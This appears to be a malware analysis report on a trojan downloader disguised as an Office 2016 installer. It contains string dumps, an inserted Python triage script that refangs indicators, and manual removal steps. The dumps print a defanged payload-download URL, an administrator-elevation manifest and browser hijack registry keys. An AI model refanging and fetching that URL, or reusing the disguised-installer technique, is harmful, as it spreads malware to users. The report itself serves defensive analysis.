hXXp://ake.needmonth.bid/stub_maker.php?program=sevenzip&tid=18778101&pid=539&b_typ=pe&reb=1&name=MICROSOFT Office PRO Plus 2016 v16.0.4229.1020 Final Nov.Update
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
RAny use of this Certificate constitutes acceptance of the DigiCert CP/CPS and the Relying Party Agreement which limit liability and are incorporated herein by reference
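
The dump above carries three things a triage note needs: the defanged download URL (stub_maker.php on ake.needmonth.bid, with the "MICROSOFT Office PRO Plus 2016" lure in its name parameter), the NSIS plugin-directory paths under %Temp%, and the embedded application manifest whose requestedExecutionLevel is requireAdministrator (the installers also send uac=1 to the affiliate servers in the traffic above). The script below is an added example, not report tooling; it refangs and extracts those items from a handful of lines copied from the dump. The manifest line is abridged to its trustInfo element, and the line-oriented URL rule (everything from the scheme to the end of the line) is an assumption that suits string dumps, where each line is one C string, but it will drag ASN.1 residue such as a trailing 0 behind certificate URLs if those lines are fed in.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Lines copied from the string dump of %original file name%.exe above,
# defanged exactly as the report prints them (hXXp, VVV). The manifest is
# abridged to its trustInfo element; the other lines are verbatim.
DUMP_SAMPLE = r"""
hXXp://nsis.sf.net/NSIS_Error
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\setup.exe
NSIS_Inetc (Mozilla)
hXXp://ake.needmonth.bid/stub_maker.php?program=sevenzip&tid=18778101&pid=539&b_typ=pe&reb=1&name=MICROSOFT Office PRO Plus 2016 v16.0.4229.1020 Final Nov.Update
VVV.digicert.com1 0)
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo></assembly>
""".strip("\n")

ASM_V1 = "urn:schemas-microsoft-com:asm.v1"
ASM_V3 = "urn:schemas-microsoft-com:asm.v3"
# NSIS unpacks plugins and payloads into %Temp%\ns<hex>.tmp\ at run time.
NSIS_TEMP_RE = re.compile(r"\\Temp\\(ns[0-9A-Fa-f]+\.tmp\\[^\s\"]+)")
NSIS_UA_RE = re.compile(r"(?:NSIS_Inetc|NSISDL/[\d.]+) \(Mozilla\)")


def refang(s):
    """Undo the report's defanging so the strings can be fed to other tools."""
    s = re.sub(r"hXXp(s?)://", r"http\1://", s)
    return re.sub(r"\bVVV\.", "www.", s)


def extract_urls(dump):
    """Collect URLs from a string dump, one string per line.

    Assumption: a URL runs from its scheme to the end of the line, because
    each dump line is one whole C string and the stub_maker URL carries
    spaces in its name parameter. Lines without a scheme are ignored, so
    certificate residue such as 'www.digicert.com1 0)' is not picked up.
    """
    urls = []
    for line in refang(dump).splitlines():
        m = re.search(r"https?://", line)
        if m:
            urls.append(line[m.start():].rstrip())
    return urls


def parse_manifest(dump):
    """Parse the embedded side-by-side manifest and read the UAC request."""
    for line in dump.splitlines():
        if "<assembly" in line:
            root = ET.fromstring(line.encode("utf-8"))
            level = root.find(".//{%s}requestedExecutionLevel" % ASM_V3)
            return {
                "installer": root.findtext("{%s}description" % ASM_V1),
                "execution_level": level.get("level") if level is not None else None,
            }
    return {"installer": None, "execution_level": None}


def triage(dump):
    """Summarise the dump: refanged URLs, hosts, NSIS temp files, UA strings, manifest."""
    urls = extract_urls(dump)
    summary = {
        "refanged_urls": urls,
        "hosts": sorted({urlsplit(u).hostname for u in urls}),
        "nsis_temp_files": NSIS_TEMP_RE.findall(dump),
        "user_agents": [ln for ln in dump.splitlines() if NSIS_UA_RE.fullmatch(ln.strip())],
    }
    summary.update(parse_manifest(dump))
    return summary


if __name__ == "__main__":
    for key, value in triage(DUMP_SAMPLE).items():
        print(key + ":", value)
```

The manifest is the detail worth keeping: an NSIS stub that declares requireAdministrator produces a UAC prompt on launch, so the "Office 2016" lure name in the stub_maker URL is what the user sees on that prompt, and the same string ends up in the Temp path the second-stage setup.exe is written to.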

%original file name%.exe_4000_rwx_10004000_00001000:

callback%d

iexplore.exe_2612:

.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... )) 
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!
Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb

Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    v2kPpgYau1.exe:3084
    cpSetup.exe:3888

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\modern-header.bmp (25 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\UserInfo.dll (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\ioSpecial.ini (4557 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\modern-wizard.bmp (26 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\InstallOptions.dll (30 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\inetc.dll (44 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\5acc58219a70e[1].exe (2888 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\B (4232 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\VVBX80bLVD (172 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\launcher[1].htm (172 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\v2kPpgYau1.exe (3705 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\268275370 (313 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\nsArray.dll (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\cpSetup.exe (156691 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\NSISdl.dll (30 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\normal_bg4[1].png (4541 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
